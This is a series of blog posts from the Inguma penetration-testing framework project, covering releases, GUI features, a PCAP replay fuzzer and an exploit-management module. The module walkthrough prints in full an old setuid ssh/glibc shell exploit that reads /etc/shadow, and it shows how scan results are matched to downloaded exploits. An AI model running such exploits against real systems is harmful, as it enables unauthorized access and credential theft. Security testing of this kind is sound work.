</div><div><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirnrpvwdMtp0AHIkSheMmK7mRCJm_WEtWFIV3MiZsUNM3vdADfEeOK6OHC0fsV6VVK7f6gmtyfkVuMMBQlGKy9sFbgdFYGqdQtwsbGze8R1zFCKNXZDy93nsh6w2kQeAA9yoRFKVH6Hc9b/s1600/bokken_web.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615468228014319682" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirnrpvwdMtp0AHIkSheMmK7mRCJm_WEtWFIV3MiZsUNM3vdADfEeOK6OHC0fsV6VVK7f6gmtyfkVuMMBQlGKy9sFbgdFYGqdQtwsbGze8R1zFCKNXZDy93nsh6w2kQeAA9yoRFKVH6Hc9b/s320/bokken_web.png" style="cursor: pointer; display: block; height: 170px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></span></div><div><div style="text-align: center;"><span class="Apple-style-span"><br />
</span></div><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"></span><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlYUCOabYqa-LXe5VuBsWbgtPNxYRrVkynMossXo6pJNaLeWxIlm9Ks6jgQSkz02ryeqUKGWNcMbei9ItqEr7Yur9iV8-BqEATT_nQBPuZ2V47NxciEtranXBpa-kYqhCoeKuuxVLdlsWc/s1600/bokken_pdf.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615468698980092450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlYUCOabYqa-LXe5VuBsWbgtPNxYRrVkynMossXo6pJNaLeWxIlm9Ks6jgQSkz02ryeqUKGWNcMbei9ItqEr7Yur9iV8-BqEATT_nQBPuZ2V47NxciEtranXBpa-kYqhCoeKuuxVLdlsWc/s320/bokken_pdf.png" style="cursor: pointer; display: block; height: 170px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></span></div><div><span class="Apple-style-span"><br />
</span></div><div>Some minor features added are:</div><div><ul><li>An icon has been added to graph nodes to <b>show the OS of the target</b> when available.</li>
<li>New<b> autosave feature</b> that will save the KB after every module execution to prevent data loss in case of GUI crash. This autosaved KB will be loaded at startup if the user wants.</li>
<li><b>Single host report</b> option added to the node menu.</li>
<li><b>Improved performance</b> of ping and scan modules.</li>
<li>More modules have been ported to the GUI, like "identify", which has also been added to the list of modules launched on adding a target.</li>
<li>We are now<b> closer to full Windows compatibility</b> as this screenshot demonstrates :-)</li>
</ul><div><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinD4QGfHFL0iElHA097ImwFwYOh3ImqAYG3OGkGR6HulDsNd7c4DWeheqI7Js_qO5F4LUKG2U-W5ulhv4ZbHKla1aKc35m3gCrqoIj6tnBJsDPIcaJEKcdyfVj2e6GdMrfPLIkJfu4GLz8/s1600/GInguma-Win7.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5615470621999352034" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinD4QGfHFL0iElHA097ImwFwYOh3ImqAYG3OGkGR6HulDsNd7c4DWeheqI7Js_qO5F4LUKG2U-W5ulhv4ZbHKla1aKc35m3gCrqoIj6tnBJsDPIcaJEKcdyfVj2e6GdMrfPLIkJfu4GLz8/s320/GInguma-Win7.png" style="cursor: pointer; display: block; height: 147px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a></span></div></div><br />
<div>We hope you enjoy using this new release as much as we enjoyed making it! Stay tuned to the project news through the <a href="http://twitter.com/Ingumito">Twitter</a> account or the <a href="http://inguma.eu/projects/inguma/wiki#Mailing-lists">mailing lists</a>. For more information, documentation, bug reporting and, of course, to download the release, visit the project's <a href="http://inguma.eu/">web site</a>.<br />
<br />
This release is dedicated to the hundreds of thousands of Spaniards that gathered on May 15th first in Madrid, then everywhere, to protest against political parties in the now-called #15M movement.</div>Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com1tag:blogger.com,1999:blog-8320914018667085850.post-65269756393475677582011-05-09T21:21:00.001+02:002011-05-17T19:36:35.120+02:00Inguma server reachable over IPv6.I just added AAAA records to the zones for <a href="http://inguma.eu">inguma.eu</a> and inguma-framework.org! I don't think I broke anything, but just for you to know.Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-65064607987857353702011-04-27T11:28:00.003+02:002011-07-05T19:50:23.552+02:00Mailing lists and more in place.Since the last post we have been busy, not only fixing bugs in Inguma but also adding some pieces of infrastructure to the project to improve the available facilities to develop Inguma.<br />
<ul><li>Two mailing lists are ready for use: <a href="http://inguma.eu/lists/listinfo/inguma-announce">inguma-announce</a> and <a href="http://inguma.eu/lists/listinfo/inguma-devel">inguma-devel</a>. Anyone familiar with OSS will infer their purpose.</li>
<li>Redmine has been upgraded to 1.1.2.</li>
<li>We are trying to import all the issues from the Google Code project into Redmine to avoid losing user reports. If you have any bug, report or suggestion, please create a Redmine account to add a new issue or contact our development list!</li>
<li>In the very near future we also intend to publish updates on Twitter to make people aware of our progress. Stay tuned!</li>
</ul><br />
Also do not forget that we are available in #inguma on the Freenode IRC network.Inguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-45332057972251662312011-02-21T16:46:00.001+01:002011-05-19T06:06:18.019+02:00Inguma keeps moving...<div style="text-align: left;">First of all we would like to thank you for the great welcome you have given to the new release; we will do our best to keep improving the project.</div><div><br />
</div><div>Since the 0.2 release many improvements have been made to Inguma and we will try to show you some of them in this post.</div><div><ul><li>Today we release a new project site and leave Google Code. The dev team has discussed a lot and finally decided to use our previous development site as the main one. You can find it at:</li>
</ul><div></div><blockquote><div><a href="http://www.inguma-framework.org/">http://www.inguma-framework.org</a></div><div><br />
</div><div>or, for the lazy ones (including ourselves), the shorter:</div><div><br />
</div><div><a href="http://www.inguma.eu/">http://www.inguma.eu</a></div></blockquote><div></div><ul><li>Lots of bugs have been fixed since 0.2 release and now Inguma should be fairly more stable, mainly the GUI.</li>
</ul><ul><li>As the GUI released at 0.2 had (and still has) many bugs and crashes quite frequently, we added a new Autosave feature. It will automatically save the KB after every module run and try to recover it at every application start. Unless you manually save the KB or decline to load it at start, it will be available to recover your work.</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2lgo_RlhZIisyDG_JiKmmaDoiDCQeLrDxOI8ChdfiLHr2JQuZhysV9JqQyPoeVaSvZYolEHa_el9rVOiQEGlojOcrGxNcwemG2wID7l-Jlb6QsjayOqUlzThHnlvfApsO2wGYp8CGUgnb/s1600/Autosave.png"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2lgo_RlhZIisyDG_JiKmmaDoiDCQeLrDxOI8ChdfiLHr2JQuZhysV9JqQyPoeVaSvZYolEHa_el9rVOiQEGlojOcrGxNcwemG2wID7l-Jlb6QsjayOqUlzThHnlvfApsO2wGYp8CGUgnb/s320/Autosave.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5576242794989858658" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 159px; " /></a></div><ul><li>We have added autofill on targetDialog so you don't have to manually fill the module target, it will be filled automatically with the IP address of the node.</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVwCAicGaibdC6P_9jr6zKHJwl42Q8xhsSKgKm8R1HgtgTcfwqGmkrsiLNqzIbLyyNjlPzoiowjsY6Q-ZipcJml84w7MMUW5ze0SBtO977bPdiH5TmO5Uvr4dNWpYnMkFrL6sGpEBcDC-E/s1600/Autofill.png"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVwCAicGaibdC6P_9jr6zKHJwl42Q8xhsSKgKm8R1HgtgTcfwqGmkrsiLNqzIbLyyNjlPzoiowjsY6Q-ZipcJml84w7MMUW5ze0SBtO977bPdiH5TmO5Uvr4dNWpYnMkFrL6sGpEBcDC-E/s320/Autofill.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5576243141100143154" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 155px; " /></a></div><ul><li>Added tooltips to confusing parameters of the gather dialog with a little description of the available options.</li>
</ul><ul><li>Added picture support on graphs. Currently it shows the OS icon when possible, or a generic icon when the OS is unknown.</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmezeqeGgojIayWSWGr9vNGeWVkxBaTmSHXS2bmvX2-dOxTjySv4wB5ZqD68mLE0ykG-uv_6aGdrUz3Lmbv6ehYH2zJOGzlFuC1pB-DNLVo6RETGT_21MDLaFKdm_oYTKommzStB-aZOvq/s1600/OS_Icons.png"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmezeqeGgojIayWSWGr9vNGeWVkxBaTmSHXS2bmvX2-dOxTjySv4wB5ZqD68mLE0ykG-uv_6aGdrUz3Lmbv6ehYH2zJOGzlFuC1pB-DNLVo6RETGT_21MDLaFKdm_oYTKommzStB-aZOvq/s320/OS_Icons.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5576243335800037554" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 113px; " /></a></div><ul><li>Right click on web vuln (OSVDB) at Vulns per port graph opens vulnerability info on browser.</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkWKM8f93wk6rFKlglFzwsEP0LLtPd-k_lsQrc5h0HIbx_LoztmRdAtNyuRKNChwo979siqZRzD9bzsu8gBPyk3nzoZlT2YtVPsAkpZVIRbzxhMflBl_7DkLSkkQ5odnu3X9xQ5zTR1XWk/s1600/web_vuln.png"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkWKM8f93wk6rFKlglFzwsEP0LLtPd-k_lsQrc5h0HIbx_LoztmRdAtNyuRKNChwo979siqZRzD9bzsu8gBPyk3nzoZlT2YtVPsAkpZVIRbzxhMflBl_7DkLSkkQ5odnu3X9xQ5zTR1XWk/s320/web_vuln.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5576249704445693090" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 170px; " /></a></div><ul><li>Added more dependency checks (graphviz, Impacket, PySNMP) to help identify and manage start up problems.</li>
</ul><div><div><span class="Apple-style-span">Checking:</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>GTK UI dependencies... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span">WARNING: No route found for IPv6 destination :: (no default route?)</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>Scapy... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>Network connectivity... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>GtkSourceView2... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>VTE Terminal... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>Impacket library... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>PySNMP library... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>Graphviz binaries... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div></div><div><ul><li><b>Improved performance</b> of the TCP, UDP and ICMP ping modules and the "portscan" module (SYN and ACK). As a result, the add target dialog is now much faster because it uses "portscan" instead of "tcpscan", and it is more complete because of <b>using "identify" on open ports</b>.</li>
</ul><ul><li>Half of the users told us that they wanted module output in new dialogs and the other half preferred to have it on the "Logs" tab at the bottom. So we finally made the module output behavior configurable through SHOW_MODULE_WIN in config.py. If set to True it will pop up module output in a new dialog, but if set to False it will send it to the Logs tab.</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCSTf-LPMQMPJet7jtC2fQH-hPi9rmfLaqzRzaoSy7vIocqZSWR_FckdV_TXeaYKRDQjegloiGoiW1S4MA1DbJkNXighXzRPSocZtlShToPpWGCvJHJPVW2jrcLKoM5ciXSaUmCcrC0scr/s1600/output.png"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCSTf-LPMQMPJet7jtC2fQH-hPi9rmfLaqzRzaoSy7vIocqZSWR_FckdV_TXeaYKRDQjegloiGoiW1S4MA1DbJkNXighXzRPSocZtlShToPpWGCvJHJPVW2jrcLKoM5ciXSaUmCcrC0scr/s320/output.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5576246067315386242" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 202px; " /></a></div></div><div><br />
</div></div><div>For more information do not hesitate to contact the team using any of the options listed on this wiki <a href="http://inguma.eu/projects/inguma/wiki/Contact">page</a>.</div>Inguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-17841093305559597662011-01-16T23:05:00.003+01:002011-09-04T05:15:16.720+02:00We are back!<div>It's been a long time since our last post and most people thought that Inguma was dead, but we are back and we have some news for you. Let's see what has changed since our last post.</div><div>
<br /></div><div>Today we launch a <a href="http://code.google.com/p/inguma/">new site</a> for the project hosted on Google Code. Almost all the documentation has been moved from the old site and much more has been added. There is still a lot to be added, but there is enough to get started using the software.</div><div>
<br /></div><div>Of course many bugs have been fixed, some new modules added and even a few have been removed but the most exciting feature we have added to this release is a fancy new GUI.</div><div>
<br /></div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMS8qR4kso2DBdF8MGRolO6OBLxJ460_5gn48VJpYCuOwJTSjfNoZmblbL3m2u9VMG84qnA9kHFyarYeqOflJGBu7fn-KSi9YpZfsg4YcksNWT-k9VAl85SyWY-86ipVKw0BG1hyphenhyphenPs4q6_/s1600/Step-9.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 187px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMS8qR4kso2DBdF8MGRolO6OBLxJ460_5gn48VJpYCuOwJTSjfNoZmblbL3m2u9VMG84qnA9kHFyarYeqOflJGBu7fn-KSi9YpZfsg4YcksNWT-k9VAl85SyWY-86ipVKw0BG1hyphenhyphenPs4q6_/s320/Step-9.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5562914971554594674" /></a>
<br /><div>The old Qt GUI has been removed and the new one is PyGtk based; of course, the good command line one is still there. <b>This new GUI can't be considered stable yet</b> and not all the modules work properly in it, but it's stable enough to be released and to perform most of the basic functions.</div><div>
<br /></div><div>If the command line one is like a toolbox with high scripting capabilities, the GUI is an attempt to integrate all those tools into a common workflow and add many data visualization aids. The main command line interface should work on the same platforms as before (Linux, Windows and MacOS), but the GUI is neither ready for nor tested on any platform other than Linux.</div><div>
<br /></div><div>Instead of writing here all the new features or a deep description of the new GUI you can go directly to the <a href="http://code.google.com/p/inguma/wiki/ConsoleQuickStart">Console</a> or <a href="http://code.google.com/p/inguma/wiki/PyGtkQuickStart">GUI quick</a> start guides and read about them. The code can be downloaded packed in a tar.gz or from the mercurial repository if you prefer to have your code up to date with all the new features that we will keep adding.</div><div>
<br /></div><div>That's all for the moment; thanks to all the people who have supported me during this time and I hope you enjoy using and, hopefully, improving this new release.</div>Inguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com3tag:blogger.com,1999:blog-8320914018667085850.post-75784243306136468912009-01-15T22:20:00.001+01:002011-08-15T05:14:18.728+02:00Exploits for all!It's been a while since my last post, as always ;), and today we are going to see a new module that almost every Inguma user has been waiting for.<br />
<br />
Currently the Inguma development team is just two people and the project is still young and lacks many features, but one of them is more necessary than the rest: exploits. Inguma itself requires lots of development so we can't spend much more time developing exploits, but with this module I will try to solve this problem a little.<br />
<br />
The new module, called 'localxpl' (local exploits), will allow Inguma to download and manage exploits from two important exploit repositories: <a href="http://www.milw0rm.com/">Milw0rm</a> and <a href="http://www.packetstormsecurity.org/">Packetstorm</a>. Let's see it in action to find out what this new module can do and how. The new module can be found under the category 'exploits' and once you type 'localxpl' you will enter its interface:<br />
<pre>inguma> show exploits
List of exploit modules
-----------------------
(...)
localxpl A Module to fetch and manage exploits from many sources
(...)
inguma> localxpl
Exploits from Milw0rm not yet downloaded
Exploits from Packetstorm not yet downloaded
Actual remotedb selected: milw0rm
LOCXPL>
</pre><br />
We can see that it informs us that we haven't downloaded any exploits yet and that, by default, the repository to work with is milw0rm. To see the options we just have to type 'help':<br />
<pre>LOCXPL> help
Inguma's Local Exploit DDBB Help
--------------------------------
remotedb Database to work with: milw0rm or packetstorm
fetch Download exploits from remotedb
help Show this help
exit Exits the DDBB
</pre><br />
As we have no local repository yet, the options shown are just a few: select the repository to get (milw0rm or packetstorm) and download the exploits from the selected repository. As we have no other choice with milw0rm selected, let's download the exploits with the command 'fetch' and see the new options:<br />
<pre>LOCXPL> fetch
Dir: /inguma/modules/exploits/
Downloading http://www.milw0rm.com/sploits/milw0rm.tar.bz2
Extracting files...
Exploits successfully downloaded on Thu Jan 15 20:19:38 2009
Operation Complete
</pre><br />
Now we know that exploits are going to be stored under the exploits directory and that the download finished fine; the path where the exploits are stored can easily be modified in the source of the module. Type 'help' again to see the new options:<br />
<pre>Inguma's Local Exploit DDBB Help
--------------------------------
remotedb Database to work with: milw0rm or packetstorm
fetch Download exploits from remotedb
Manage Milw0rm DDBB commands
----------------------------
list Shows list of local exploits. VERY VERBOSE
search Search exploits; use the 'tag' variable
Example: to search for windows exploits
'tag Windows'
rport Shows exploits afecting a remote port
Define the port using command 'port 22'
Port must be numeric: 22 intead of SSH
correlate Searches the DDBB for all exploits matching rport
for all the ports of a scaned machine. Specify
target machine with 'target 192.168.0.1'
Be sure to scan the machine before!
show Shows selected exploit source code
Select exploit using xplpath command:
'xplpath path/to/exploit'
help Show this help
exit Exits the DDBB
</pre><br />
Now that we have some exploits downloaded we have some more operations to perform with them. For example we can list all the exploits downloaded from milw0rm just by typing 'list', but this will output lots of them so... We can also now search all the exploits for a given keyword just by setting it with the command 'tag' and then running 'search':<br />
<pre>LOCXPL> tag openssh
New search tag: openssh
LOCXPL> search
Searching milw0rm local DDBB for tag: openssh
./platforms/linux/local/258.sh glibc-2.2 and openssh-2.3.0p1 exploits glibc >= 2.1.9x
</pre><br />
We got one match for an exploit related to 'OpenSSH' and now we can get more information just by displaying its contents; just set the path to the exploit using the command 'xplpath' and the path you got from the search results and type 'show':<br />
<pre>LOCXPL> xplpath ./modules/exploits/milw0rm/platforms/linux/local/258.sh
./modules/exploits/milw0rm/platforms/linux/local/258.sh set to show.
LOCXPL> show
# Charles Stevenson <csteven@newhope.terraplex.com>
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)
# This exploits is for glibc >= 2.1.9x.
# (****krochos@linuxmail.org****)
# Edit this if you have a problem with path
ssh=/usr/bin/ssh
traceroute=/usr/sbin/traceroute
FILE=/etc/shadow # File to read
###############################################################################
echo "$ssh"
echo "[*] Checking permisions..."
if [ ! -u $ssh ]; then
echo "$ssh is NOT setuid on this system or does not exist at all!"
if [ ! -u $traceroute ]; then
echo "$traceroute is NOT setuid on this system or does not exist at all!"
exit 0
fi
fi
export RESOLV_HOST_CONF=$FILE
echo "[*] Glibc bug found by Charles Stevenson <csteven@newhope.terraplex.com>"
echo "[*] krochos@linuxmail.org"
sleep 1
echo "[*] export RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv
cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '
# milw0rm.com [2001-01-25]
</csteven@newhope.terraplex.com></csteven@newhope.terraplex.com></pre><br />
Another option is to list all the exploits affecting a given remote port using the command 'rport' after specifying the remote port with the command 'port' as explained in the help; the command 'correlate' will be shown later in this post.<br />
<br />
Now that we have seen what we can do with the Milw0rm repository let's see what we can do with Packetstorm; first we switch to packetstorm with the command 'remotedb' and type 'help':<br />
<pre>LOCXPL> remotedb packetstorm
New remotedb selected: packetstorm
LOCXPL> help
Inguma's Local Exploit DDBB Help
--------------------------------
remotedb Database to work with: milw0rm or packetstorm
fetch Download exploits from remotedb
years A space separated list of years to fetch
Example: 'years 06 07 08'
help Show this help
exit Exits the DDBB
</pre><br />
As with milw0rm, until we get the exploits we have few choices. But now we have one difference: packetstorm classifies its exploits by year, so we can specify the years we want to fetch with the command 'years'; by default exploits from the years 2007/08 will be downloaded.<br />
<pre>LOCXPL> years 08
Years: ['08']
LOCXPL> fetch
Dir: /inguma/modules/exploits/packetstorm/
Start: 2008
Downloading: http://packetstormsecurity.org/0812-exploits/2008-exploits.tgz ...
Done. Extracting files...
Done: 2008
Exploits successfully downloaded on Thu Jan 15 20:28:44 2009
</pre><br />
Almost the same as with milw0rm till now. From now on if we fetch exploits from milw0rm or packetstorm they will be updated, and if we specify 'years 07 08' and fetch again only the exploits of year 2007 will be downloaded. So let's see the new options we have now for the packetstorm repository:<br />
<pre>Inguma's Local Exploit DDBB Help
--------------------------------
remotedb Database to work with: milw0rm or packetstorm
fetch Download exploits from remotedb
years A space separated list of years to fetch
Example: 'years 06 07 08'
Manage Packetstorm DDBB commands
--------------------------------
list Shows list of local exploits. VERY VERBOSE
Also navigate the exploits listing going with
your browser to, for example:
/inguma/modules/exploits/packetstorm/08-exploits/0801-exploits/index.html
search Search exploits; use the 'tag' variable
Example: to search for windows exploits
Example: 'tag Windows Vista'
Optionaly append a year to search only on exploits of this year
Example: 'year 08'
show Shows selected exploit source code
Select exploit using xplpath command:
'xplpath path/to/exploit'
help Show this help
exit Exits the DDBB
</pre><br />
As we can see, the options are almost the same as the ones we have with milw0rm, but here we can't search by port; if we look at the help of the command 'list' we can see that we can browse the exploits of this repository by opening the index.html file that exists in each directory of the repository, just change the year and month in the path.<br />
<br />
And the last command we are going to see is 'correlate', which we can find in the milw0rm help. With this command we can automatically search for all the exploits that may affect the ports that have been reported open by the port scans. So, the first thing we need to do is a port scan:<br />
<pre>inguma> target = '192.168.0.1'
inguma> tcpscan
Scanning port 17004 (417/417)
Open ports
----------
Port 1720 is open
Port 23/telnet is open
</pre><br />
Once we get the open ports for this target we enter the 'localxpl' interface to correlate the results with the existing exploits. As we have already downloaded the exploits we are now informed of the dates of the downloads so we can decide if we need to update.<br />
<pre>inguma> localxpl
Last Milw0rm DDBB update: Thu Jan 15 20:19:38 2009
Last Packetstorm DDBB update: Thu Jan 15 20:28:44 2009
Actual remotedb selected: milw0rm
</pre><br />
Now we just need to specify the target we have scanned and we want to correlate and launch the command 'correlate':<br />
<pre>LOCXPL> target 192.168.0.1
Target set for correlation: 192.168.0.1
LOCXPL> correlate
Searching exploits available on milw0rm DDBB for port TCP/23
/inguma/modules/exploits/milw0rm/rport/23/346.c
/inguma/modules/exploits/milw0rm/rport/23/3293.sh
/inguma/modules/exploits/milw0rm/rport/23/254.c
/inguma/modules/exploits/milw0rm/rport/23/621.c
/inguma/modules/exploits/milw0rm/rport/23/89.c
/inguma/modules/exploits/milw0rm/rport/23/409.c
Searching exploits available on milw0rm DDBB for port TCP/1720
No exploits found for port TCP/1720
</pre><br />
OK, this is not enough to get accurate results, but it's a starting point; until I improve the scanning modules to also get and store information about the services listening on each port, that's all we have.<br />
<br />
So that's all folks; I hope that I will improve this module soon and also get new interesting ones. To finish, a tip for my next module: PIG. ;)Inguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com1tag:blogger.com,1999:blog-8320914018667085850.post-82860300023010941322008-12-27T17:49:00.002+01:002011-08-15T05:15:29.775+02:00After a long while...Hi!<br />
<br />
After a long while Hugo & I decided to prepare the new Inguma version (Release 0.1.0) with some new features. There are new modules in the new version, such as the ASNQuery module or the Nmap frontend, both created by Hugo, and new features & tools.<br />
<br />
The 2 most interesting new tools added to the framework are, for sure, the PCAP-based fuzzer and the OpenDis Binary Navigator.<br />
<br />
The PCAP based fuzzer works this way: record a session with your target server application using your favourite sniffer, save the recorded session as one PCAP file and create a new PCAP based fuzzer like the following:<br />
<br />
<pre>-----------------------------------------------------------------------------------
import sys
from scapy import *
from fuzzpcap import *
from lib import libfuzz

def main(pcapFile, dest, destPort):
    replayList = []
    pktList = rdpcap(pcapFile)

    for pkt in pktList:
        # Skip packets that are not TCP or carry no payload
        if not pkt.haslayer(TCP) or not pkt.haslayer(Raw):
            continue

        tcpPkt = pkt[TCP]
        flags = tcpPkt.sprintf("%flags%")
        dst = pkt.sprintf("%IP.dst%")
        dstPort = tcpPkt.sprintf("%TCP.dport%")

        # Keep only the data packets (PSH+ACK) sent to the target
        if flags == "PA" and dst == dest and dstPort == destPort:
            # Get the packet's data
            pktBuf = str(tcpPkt[Raw])
            replayList.append(pktBuf)

    replayer = CReplayFuzzer(dest, destPort, replayList)
    replayer.verbose = False # Show every packet that will be sent?
    replayer.timeout = 0.3 # Time to wait for a response?
    replayer.waitResponse = True # Wait for a response?
    replayer.startPacket = 0 # Start from packet number 0
    replayer.dontWaitFor = xrange(0, 1024) # Don't wait for a response for these packets
    replayer.fuzz() # Start fuzzing now!

# Entry point: PCAP file, target address and target port from the command line
if __name__ == "__main__":
    main(sys.argv[1], sys.argv[2], sys.argv[3])
-----------------------------------------------------------------------------------
</pre><br />
<span style="font-size:100%;"><br />
That easy. For some (undocumented) protocols this is a fast way to start fuzzing a complete communication session without having any knowledge about the communication protocol.<br />
<br />
Another interesting tool (as previously pointed out) is the OpenDis Binary Navigator. It's a frontend for OpenDis databases (the format of the databases changed from cPickle objects to SQLite databases). With this tool you can upload programs to be analyzed by OpenDis and generate an SQLite based database (this is a web server, so bind it to 127.0.0.1 if you don't want to expose it to your network). This database can be navigated using the OpenDis Binary Navigator.<br />
<br />
The most curious features of OpenDis Binary Navigator right now are the ability to generate basic block diagrams (you need Graphviz) and the option to calculate the CC (Cyclomatic Complexity) of a procedure. You can see screenshots at the end of this post.<br />
<br />
Well, that's all at the moment. I will try to upload the new version of Inguma to sourceforge before the end of the year. Happy XMas and happy new year!<br />
</span><br />
<span><br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRFyXWwQWt1Lyebt6-DSr3GloGivJfZvp5fZ6Za8L8qV3sW8A7Jy5OGcNm5gjQFhHig6ree-_GS8QLqzQu-6wqxXYD4VUrrGgsD_SKJ1fo9ELiuAZS2d39q8_2zPzKoqXw4mY-Cwgin7Xm/s1600-h/example1.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 240px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRFyXWwQWt1Lyebt6-DSr3GloGivJfZvp5fZ6Za8L8qV3sW8A7Jy5OGcNm5gjQFhHig6ree-_GS8QLqzQu-6wqxXYD4VUrrGgsD_SKJ1fo9ELiuAZS2d39q8_2zPzKoqXw4mY-Cwgin7Xm/s320/example1.jpg" alt="" id="BLOGGER_PHOTO_ID_5284520472019434434" border="0" /></a><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivp9193rOdyLfxjlc8ATgMXM9kHiEfYUUluV1TFUfOF-aszUU9aLiL0J8ssTy_wLfY03DO4lJXYPqY1yw7G-bOKDUnuvV3PiCucD9XKI7dpiFAPnqD_pWij-cPSr1fwhEK9SBW62W3WX6M/s1600-h/example3.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 134px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivp9193rOdyLfxjlc8ATgMXM9kHiEfYUUluV1TFUfOF-aszUU9aLiL0J8ssTy_wLfY03DO4lJXYPqY1yw7G-bOKDUnuvV3PiCucD9XKI7dpiFAPnqD_pWij-cPSr1fwhEK9SBW62W3WX6M/s320/example3.jpg" alt="" id="BLOGGER_PHOTO_ID_5284519654483802194" border="0" /></a><br />
